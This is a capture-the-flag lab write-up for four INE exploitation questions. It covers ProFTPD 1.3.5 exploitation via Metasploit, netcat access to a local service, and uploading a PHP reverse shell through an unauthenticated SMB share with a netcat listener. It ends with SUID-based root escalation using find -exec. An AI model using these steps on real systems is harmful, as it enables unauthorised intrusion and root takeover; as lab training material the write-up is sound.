CTF 3 - Exploitation

---

Question 1

A vulnerable service maybe running on target1.ine.local. If exploitable, retrieve the flag from the root directory.

Firstly, let's run a basic Nmap scan to find out what's running on the target. We can see that the version 1.3.5 of FTP is running so let's search for an exploit using SearchSploit. We can see that there is a Metasploit module (proftpd_modcopy) which we can use to exploit the service.

Let's load up Metasploit and run the exploit. Note that you will need to change the SITEPATH option as on within the documentation of the web page being hosted on port 80, it says that the root web Apache HTTP server is installed at /var/www/html.

We can then upgrade our session to a meterpreter session and open up a shell. Navigate to the root directory to get the flag.

Question 2

Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.

The question mentions that a local network on the target is vulnerable. Note that you need to run this command within the meterpreter session. To view the local services running on the target, we can use the command:

netstat -tuln 127.0.0.1

We can see that port 8888 is open so we can interact with it using Netcat but note that you will need to open a shell and run /bin/bash -i:

nc 127.0.0.1 8888

Since it asks for a password, let's use the phrase letmein as that was the hint from the previous flag and we have the second flag.

Question 3

A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?

Again, run an Nmap scan to see what services are running on the target. We can see that SMB or SAMBA in this case, is running. We can enumerate shares and other useful information using enum4linux.

In this case, we can see that the share site-uploads is accessible without credentials so let's navigate to that in our web browser. Since we have access to it and can upload files using smbclient, let's copy a PHP reverse shell to our current directory. We can do this by running:

cp /usr/share/webshells/php/php-reverse-shell.php

We can then upload it to the server by connecting to it using:

smbclient //target2.ine.local/site-uploads

# To upload the file:
put php-reverse-shell.php

Please note that when using this PHP reverse shell, you do have to edit some information for it to work. You can use a text editor of your choice (either vim or nano). Replace the IP field with your IP address as this is the IP address the shell will connect back to. Then we need to set up a listener using Netcat (nc -nvlp 1234) to listen for when the shell is executed to obtain a reverse connection.

Now open up the directory in the web browser again and click on the php-reverse-shell.php file. Then, head over to your Netcat listener and we have obtained access. Again, navigate to the root directory to cat out the flag.

Question 4

Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?

For this question, I really got stuck - so big thanks to @Prinu_17 for her writeup.

Firstly, we need to check what shells are available on the system and what permissions each shell has which we can do using the following command:

cat /etc/shells | while read shell; do ls -l $shell 2>/dev/null; done

The command read each shell listed in /etc/shells and checks the permissions of each one using ls -l. It suppresses or removes errors with 2>/dev/null.

Essentially, we can use one of these shells to escalate our privileges. However, only a shell with all the permissions will be useful. We also need to check for executables with SetUID bit set that can run with root privileges. The SetUID bit set allows users to execute files with the permissions of the file owner's (e.g. root) which will allow us to escalate our privileges.

To check for executables with the SetUID bit set that can run with root privileges, we can run the command:

find / -perm -4000 2>/dev/null

This will essentially start searching in the root directory, look for files with the SetUID bit set (-perm -4000). It also suppresses error messages by redirecting them to /dev/null.

We can combine the find command with an executable to spawn a new shell with root privileges.

find / -exec /bin/rbash -p \; -quit

Now that we have escalated our privileges we can cat out the last flag using cat /root/flag4.txt.